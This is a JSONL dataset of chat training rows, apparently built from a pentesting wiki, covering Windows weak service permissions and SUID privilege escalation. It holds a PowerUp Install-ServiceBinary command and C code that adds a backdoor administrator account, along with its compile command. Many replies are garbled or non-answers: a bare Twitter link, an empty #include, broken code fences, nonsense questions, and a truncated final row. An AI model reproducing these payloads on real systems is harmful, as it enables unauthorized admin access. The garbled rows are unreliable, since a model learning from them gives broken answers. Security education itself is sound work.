{"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for SUID/SGID binaries - Binary exploitation"}, {"role": "assistant", "content": "In some cases, the binary that has SUID/SGID permissions can be reverse-engineered and attackers find ways to change the execution flow of that program to make it run something else."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for SUID/SGID binaries - Binary exploitation", "response": "In some cases, the binary that has SUID/SGID permissions can be reverse-engineered and attackers find ways to change the execution flow of that program to make it run something else.", "metadata": {"corpus_index": 1447, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/suid-sgid-binaries.md", "page_title": "SUID/SGID binaries", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 🛠️ Account privileges"}, {"role": "assistant", "content": "https://twitter.com/fr0gger_/status/1379465943965909000/photo/1"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 🛠️ Account privileges", "response": "https://twitter.com/fr0gger_/status/1379465943965909000/photo/1", "metadata": {"corpus_index": 1448, "category": "web", "source_file": "docs/src/infra/privilege-escalation/windows/account-privileges.md", "page_title": "🛠️ Account privileges", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ Account privileges during a pentest?"}, {"role": "assistant", "content": "https://twitter.com/fr0gger_/status/1379465943965909000/photo/1"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ Account privileges during a pentest?", "response": "https://twitter.com/fr0gger_/status/1379465943965909000/photo/1", "metadata": {"corpus_index": 1448, "category": "web", "source_file": "docs/src/infra/privilege-escalation/windows/account-privileges.md", "page_title": "🛠️ Account privileges", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 🛠️ Weak service permissions - Theory"}, {"role": "assistant", "content": "File permissions in Windows define who is allowed to access, modify, or execute files on the system. If these permissions are misconfigured, they can enable unauthorized users to alter or replace critical files, potentially leading to security vulnerabilities such as unauthorized access.\n\nBelow is a summary of Windows file permissions based on the provided table:\n\n F (Full access): Grants complete control over the file, including modifying and deleting it.\n M (Modify access): Allows editing and deleting the file, but not changing permissions.\n RX (Read and execute access): Permits viewing the file and executing it if it's an executable.\n R (Read-only access): Only allows viewing the file without making changes.\n W (Write-only access): Permits writing to the file but not reading or executing it."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 🛠️ Weak service permissions - Theory", "response": "File permissions in Windows define who is allowed to access, modify, or execute files on the system. If these permissions are misconfigured, they can enable unauthorized users to alter or replace critical files, potentially leading to security vulnerabilities such as unauthorized access.\n\nBelow is a summary of Windows file permissions based on the provided table:\n\n F (Full access): Grants complete control over the file, including modifying and deleting it.\n M (Modify access): Allows editing and deleting the file, but not changing permissions.\n RX (Read and execute access): Permits viewing the file and executing it if it's an executable.\n R (Read-only access): Only allows viewing the file without making changes.\n W (Write-only access): Permits writing to the file but not reading or executing it.", "metadata": {"corpus_index": 1449, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ Weak service permissions - Theory?"}, {"role": "assistant", "content": "File permissions in Windows define who is allowed to access, modify, or execute files on the system. If these permissions are misconfigured, they can enable unauthorized users to alter or replace critical files, potentially leading to security vulnerabilities such as unauthorized access.\n\nBelow is a summary of Windows file permissions based on the provided table:\n\n F (Full access): Grants complete control over the file, including modifying and deleting it.\n M (Modify access): Allows editing and deleting the file, but not changing permissions.\n RX (Read and execute access): Permits viewing the file and executing it if it's an executable.\n R (Read-only access): Only allows viewing the file without making changes.\n W (Write-only access): Permits writing to the file but not reading or executing it."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ Weak service permissions - Theory?", "response": "File permissions in Windows define who is allowed to access, modify, or execute files on the system. If these permissions are misconfigured, they can enable unauthorized users to alter or replace critical files, potentially leading to security vulnerabilities such as unauthorized access.\n\nBelow is a summary of Windows file permissions based on the provided table:\n\n F (Full access): Grants complete control over the file, including modifying and deleting it.\n M (Modify access): Allows editing and deleting the file, but not changing permissions.\n RX (Read and execute access): Permits viewing the file and executing it if it's an executable.\n R (Read-only access): Only allows viewing the file without making changes.\n W (Write-only access): Permits writing to the file but not reading or executing it.", "metadata": {"corpus_index": 1449, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 🛠️ Weak service permissions - Enumerate of vulnerable services work?"}, {"role": "assistant", "content": "This type of abuse can occur when the binary of a Windows service is misconfigured. If the permissions for this binary allow a local user without special privileges to modify or replace it with a malicious version, the attacker may gain the privileges of the service account, which is often a high-privilege account.\n\nEnumeration can be performed using PowerShell, either by leveraging native PowerShell commands (Living off the Land) or by utilizing additional tools and scripts like PowerUp. The main difference between the two lies in the results: PowerUp can identify whether a service is vulnerable, while PowerShell merely lists the binary services. In this example, the aniService service is misconfigured and vulnerable to this attack.\n\n```powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 🛠️ Weak service permissions - Enumerate of vulnerable services work?", "response": "This type of abuse can occur when the binary of a Windows service is misconfigured. If the permissions for this binary allow a local user without special privileges to modify or replace it with a malicious version, the attacker may gain the privileges of the service account, which is often a high-privilege account.\n\nEnumeration can be performed using PowerShell, either by leveraging native PowerShell commands (Living off the Land) or by utilizing additional tools and scripts like PowerUp. The main difference between the two lies in the results: PowerUp can identify whether a service is vulnerable, while PowerShell merely lists the binary services. In this example, the aniService service is misconfigured and vulnerable to this attack.\n\n```powershell", "metadata": {"corpus_index": 1450, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 🛠️ Weak service permissions - Enumerate of vulnerable services?"}, {"role": "assistant", "content": "This type of abuse can occur when the binary of a Windows service is misconfigured. If the permissions for this binary allow a local user without special privileges to modify or replace it with a malicious version, the attacker may gain the privileges of the service account, which is often a high-privilege account.\n\nEnumeration can be performed using PowerShell, either by leveraging native PowerShell commands (Living off the Land) or by utilizing additional tools and scripts like PowerUp. The main difference between the two lies in the results: PowerUp can identify whether a service is vulnerable, while PowerShell merely lists the binary services. In this example, the aniService service is misconfigured and vulnerable to this attack.\n\n```powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 🛠️ Weak service permissions - Enumerate of vulnerable services?", "response": "This type of abuse can occur when the binary of a Windows service is misconfigured. If the permissions for this binary allow a local user without special privileges to modify or replace it with a malicious version, the attacker may gain the privileges of the service account, which is often a high-privilege account.\n\nEnumeration can be performed using PowerShell, either by leveraging native PowerShell commands (Living off the Land) or by utilizing additional tools and scripts like PowerUp. The main difference between the two lies in the results: PowerUp can identify whether a service is vulnerable, while PowerShell merely lists the binary services. In this example, the aniService service is misconfigured and vulnerable to this attack.\n\n```powershell", "metadata": {"corpus_index": 1450, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about USING POWERSHELL"}, {"role": "assistant", "content": "> Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about USING POWERSHELL", "response": "> Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}", "metadata": {"corpus_index": 1451, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through USING POWERSHELL"}, {"role": "assistant", "content": "> Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through USING POWERSHELL", "response": "> Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}", "metadata": {"corpus_index": 1451, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does USING POWERUP work?"}, {"role": "assistant", "content": "> Invoke-AllChecks\n[*] Checking service executable and argument permissions...\n\nServiceName : aniService\nPath : C:\\Program Files\\AniService\\ani.exe\nModifiableFile : C:\\Program Files\\AniService\\ani.exe\nStartName : LocalSystem\nAbuseFunction : Install-ServiceBinary -ServiceName 'aniService'\n``\nOnce the vulnerable binary has been identified using a tool like PowerUp or Winpeas, the permissions of the binary can be checked with icacls.exe. The most relevant permissions to look for are (F) and (M), particularly when they are associated with a group such as Everyone: or a local user, for example.\n`powershell\n> icacls \"C:\\Program Files\\AniService\\ani.exe\"\nC:\\Program Files\\AniService\\ani.exe\n AUTORITE NT\\System:(F)\n BUILTIN\\Administrators:(F)\n Everyone:(F)\n BUILTIN\\Users:(RX)\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does USING POWERUP work?", "response": "> Invoke-AllChecks\n[*] Checking service executable and argument permissions...\n\nServiceName : aniService\nPath : C:\\Program Files\\AniService\\ani.exe\nModifiableFile : C:\\Program Files\\AniService\\ani.exe\nStartName : LocalSystem\nAbuseFunction : Install-ServiceBinary -ServiceName 'aniService'\n``\nOnce the vulnerable binary has been identified using a tool like PowerUp or Winpeas, the permissions of the binary can be checked with icacls.exe. The most relevant permissions to look for are (F) and (M), particularly when they are associated with a group such as Everyone: or a local user, for example.\n`powershell\n> icacls \"C:\\Program Files\\AniService\\ani.exe\"\nC:\\Program Files\\AniService\\ani.exe\n AUTORITE NT\\System:(F)\n BUILTIN\\Administrators:(F)\n Everyone:(F)\n BUILTIN\\Users:(RX)\n``", "metadata": {"corpus_index": 1452, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on USING POWERUP"}, {"role": "assistant", "content": "> Invoke-AllChecks\n[*] Checking service executable and argument permissions...\n\nServiceName : aniService\nPath : C:\\Program Files\\AniService\\ani.exe\nModifiableFile : C:\\Program Files\\AniService\\ani.exe\nStartName : LocalSystem\nAbuseFunction : Install-ServiceBinary -ServiceName 'aniService'\n``\nOnce the vulnerable binary has been identified using a tool like PowerUp or Winpeas, the permissions of the binary can be checked with icacls.exe. The most relevant permissions to look for are (F) and (M), particularly when they are associated with a group such as Everyone: or a local user, for example.\n`powershell\n> icacls \"C:\\Program Files\\AniService\\ani.exe\"\nC:\\Program Files\\AniService\\ani.exe\n AUTORITE NT\\System:(F)\n BUILTIN\\Administrators:(F)\n Everyone:(F)\n BUILTIN\\Users:(RX)\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on USING POWERUP", "response": "> Invoke-AllChecks\n[*] Checking service executable and argument permissions...\n\nServiceName : aniService\nPath : C:\\Program Files\\AniService\\ani.exe\nModifiableFile : C:\\Program Files\\AniService\\ani.exe\nStartName : LocalSystem\nAbuseFunction : Install-ServiceBinary -ServiceName 'aniService'\n``\nOnce the vulnerable binary has been identified using a tool like PowerUp or Winpeas, the permissions of the binary can be checked with icacls.exe. The most relevant permissions to look for are (F) and (M), particularly when they are associated with a group such as Everyone: or a local user, for example.\n`powershell\n> icacls \"C:\\Program Files\\AniService\\ani.exe\"\nC:\\Program Files\\AniService\\ani.exe\n AUTORITE NT\\System:(F)\n BUILTIN\\Administrators:(F)\n Everyone:(F)\n BUILTIN\\Users:(RX)\n``", "metadata": {"corpus_index": 1452, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use Once for using powerup?"}, {"role": "assistant", "content": "Once the vulnerable binary has been identified using a tool like PowerUp or Winpeas, the permissions of the binary can be checked with **icacls.exe**. The most relevant permissions to look for are (F) and (M), particularly when they are associated with a group such as `Everyone`: or a local user, for example."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use Once for using powerup?", "response": "Once the vulnerable binary has been identified using a tool like PowerUp or Winpeas, the permissions of the binary can be checked with **icacls.exe**. The most relevant permissions to look for are (F) and (M), particularly when they are associated with a group such as `Everyone`: or a local user, for example.", "metadata": {"corpus_index": 1453, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Once"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through USING POWERUP"}, {"role": "assistant", "content": "Once the vulnerable binary has been identified using a tool like PowerUp or Winpeas, the permissions of the binary can be checked with **icacls.exe**. The most relevant permissions to look for are (F) and (M), particularly when they are associated with a group such as `Everyone`: or a local user, for example."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through USING POWERUP", "response": "Once the vulnerable binary has been identified using a tool like PowerUp or Winpeas, the permissions of the binary can be checked with **icacls.exe**. The most relevant permissions to look for are (F) and (M), particularly when they are associated with a group such as `Everyone`: or a local user, for example.", "metadata": {"corpus_index": 1453, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 🛠️ Weak service permissions - Crafting a malicious binary"}, {"role": "assistant", "content": "In the current practical case, the executable permission (F) is set for the \"Everyone\" group. However, if the permission had been set to (M), abuse would also have been possible. Due to this misconfiguration, the attacker can easily replace the binary with a malicious version. PowerUp can be used to automate this task.\n\n``powershell\n> Install-ServiceBinary -ServiceName 'aniService' -User vador -P \"D4rkIsD@rk\"\n`\n\nOnce the command is executed, it will only be necessary to restart the service to ensure that the abuse has been successfully carried out.\n\nThe second method involves creating a custom malicious binary, which can offer advantages, such as bypassing antivirus detection. Below is a simple C code that will execute a Windows system command (the system command can, of course, be replaced with another).\n`C\n#include \nint main ()\n{\nint i;\n i = system(\"net user vador D4rkIsD@rk /add && timeout /t 2 && net localgroup Administrators vador /add\");\nreturn 0;\n}\n\n`\n\nTo compile Windows Executable it is possible to use i686-w64-mingw32-gcc.\n`bash\n> i686-w64-mingw32-gcc CODE.C$ -lws2_32 -o FILE.EXE$\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 🛠️ Weak service permissions - Crafting a malicious binary", "response": "In the current practical case, the executable permission (F) is set for the \"Everyone\" group. However, if the permission had been set to (M), abuse would also have been possible. Due to this misconfiguration, the attacker can easily replace the binary with a malicious version. PowerUp can be used to automate this task.\n\n``powershell\n> Install-ServiceBinary -ServiceName 'aniService' -User vador -P \"D4rkIsD@rk\"\n`\n\nOnce the command is executed, it will only be necessary to restart the service to ensure that the abuse has been successfully carried out.\n\nThe second method involves creating a custom malicious binary, which can offer advantages, such as bypassing antivirus detection. Below is a simple C code that will execute a Windows system command (the system command can, of course, be replaced with another).\n`C\n#include \nint main ()\n{\nint i;\n i = system(\"net user vador D4rkIsD@rk /add && timeout /t 2 && net localgroup Administrators vador /add\");\nreturn 0;\n}\n\n`\n\nTo compile Windows Executable it is possible to use i686-w64-mingw32-gcc.\n`bash\n> i686-w64-mingw32-gcc CODE.C$ -lws2_32 -o FILE.EXE$\n``", "metadata": {"corpus_index": 1454, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ Weak service permissions - Crafting a malicious binary?"}, {"role": "assistant", "content": "In the current practical case, the executable permission (F) is set for the \"Everyone\" group. However, if the permission had been set to (M), abuse would also have been possible. Due to this misconfiguration, the attacker can easily replace the binary with a malicious version. PowerUp can be used to automate this task.\n\n``powershell\n> Install-ServiceBinary -ServiceName 'aniService' -User vador -P \"D4rkIsD@rk\"\n`\n\nOnce the command is executed, it will only be necessary to restart the service to ensure that the abuse has been successfully carried out.\n\nThe second method involves creating a custom malicious binary, which can offer advantages, such as bypassing antivirus detection. Below is a simple C code that will execute a Windows system command (the system command can, of course, be replaced with another).\n`C\n#include \nint main ()\n{\nint i;\n i = system(\"net user vador D4rkIsD@rk /add && timeout /t 2 && net localgroup Administrators vador /add\");\nreturn 0;\n}\n\n`\n\nTo compile Windows Executable it is possible to use i686-w64-mingw32-gcc.\n`bash\n> i686-w64-mingw32-gcc CODE.C$ -lws2_32 -o FILE.EXE$\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ Weak service permissions - Crafting a malicious binary?", "response": "In the current practical case, the executable permission (F) is set for the \"Everyone\" group. However, if the permission had been set to (M), abuse would also have been possible. Due to this misconfiguration, the attacker can easily replace the binary with a malicious version. PowerUp can be used to automate this task.\n\n``powershell\n> Install-ServiceBinary -ServiceName 'aniService' -User vador -P \"D4rkIsD@rk\"\n`\n\nOnce the command is executed, it will only be necessary to restart the service to ensure that the abuse has been successfully carried out.\n\nThe second method involves creating a custom malicious binary, which can offer advantages, such as bypassing antivirus detection. Below is a simple C code that will execute a Windows system command (the system command can, of course, be replaced with another).\n`C\n#include \nint main ()\n{\nint i;\n i = system(\"net user vador D4rkIsD@rk /add && timeout /t 2 && net localgroup Administrators vador /add\");\nreturn 0;\n}\n\n`\n\nTo compile Windows Executable it is possible to use i686-w64-mingw32-gcc.\n`bash\n> i686-w64-mingw32-gcc CODE.C$ -lws2_32 -o FILE.EXE$\n``", "metadata": {"corpus_index": 1454, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the Install-ServiceBinary syntax for 🛠️ weak service permissions - crafting a malicious binary?"}, {"role": "assistant", "content": "> Install-ServiceBinary -ServiceName 'aniService' -User vador -P \"D4rkIsD@rk\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the Install-ServiceBinary syntax for 🛠️ weak service permissions - crafting a malicious binary?", "response": "> Install-ServiceBinary -ServiceName 'aniService' -User vador -P \"D4rkIsD@rk\"", "metadata": {"corpus_index": 1455, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Install-ServiceBinary"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 🛠️ Weak service permissions - Crafting a malicious binary"}, {"role": "assistant", "content": "> Install-ServiceBinary -ServiceName 'aniService' -User vador -P \"D4rkIsD@rk\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 🛠️ Weak service permissions - Crafting a malicious binary", "response": "> Install-ServiceBinary -ServiceName 'aniService' -User vador -P \"D4rkIsD@rk\"", "metadata": {"corpus_index": 1455, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> Install-ServiceBinary -ServiceName 'aniService' -User vador -P \"D4rkIsD@rk\"`?"}, {"role": "assistant", "content": "This command is used for 🛠️ weak service permissions - crafting a malicious binary. Crafting a malicious binary"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> Install-ServiceBinary -ServiceName 'aniService' -User vador -P \"D4rkIsD@rk\"`?", "response": "This command is used for 🛠️ weak service permissions - crafting a malicious binary. Crafting a malicious binary", "metadata": {"corpus_index": 1455, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the include syntax for 🛠️ weak service permissions - crafting a malicious binary?"}, {"role": "assistant", "content": "#include \nint main ()\n{\nint i;\n i = system(\"net user vador D4rkIsD@rk /add && timeout /t 2 && net localgroup Administrators vador /add\");\nreturn 0;\n}"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the include syntax for 🛠️ weak service permissions - crafting a malicious binary?", "response": "#include \nint main ()\n{\nint i;\n i = system(\"net user vador D4rkIsD@rk /add && timeout /t 2 && net localgroup Administrators vador /add\");\nreturn 0;\n}", "metadata": {"corpus_index": 1456, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "include"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ Weak service permissions - Crafting a malicious binary during a pentest?"}, {"role": "assistant", "content": "#include \nint main ()\n{\nint i;\n i = system(\"net user vador D4rkIsD@rk /add && timeout /t 2 && net localgroup Administrators vador /add\");\nreturn 0;\n}"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ Weak service permissions - Crafting a malicious binary during a pentest?", "response": "#include \nint main ()\n{\nint i;\n i = system(\"net user vador D4rkIsD@rk /add && timeout /t 2 && net localgroup Administrators vador /add\");\nreturn 0;\n}", "metadata": {"corpus_index": 1456, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the i686-w64-mingw32-gcc command for 🛠️ weak service permissions - crafting a malicious binary"}, {"role": "assistant", "content": "> i686-w64-mingw32-gcc CODE.C$ -lws2_32 -o FILE.EXE$"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the i686-w64-mingw32-gcc command for 🛠️ weak service permissions - crafting a malicious binary", "response": "> i686-w64-mingw32-gcc CODE.C$ -lws2_32 -o FILE.EXE$", "metadata": {"corpus_index": 1457, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "i686-w64-mingw32-gcc"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ Weak service permissions - Crafting a malicious binary during a pentest?"}, {"role": "assistant", "content": "> i686-w64-mingw32-gcc CODE.C$ -lws2_32 -o FILE.EXE$"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ Weak service permissions - Crafting a malicious binary during a pentest?", "response": "> i686-w64-mingw32-gcc CODE.C$ -lws2_32 -o FILE.EXE$", "metadata": {"corpus_index": 1457, "category": "windows", "source_file": "docs/src/infra/privilege-escalation/windows/weak-service-permissions.md", "page_title": "🛠️ Weak service permissions", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> i686-w64-mingw32-gcc CODE.C$ -lws2_32 -o FILE.EXE$`?"}, {"role": 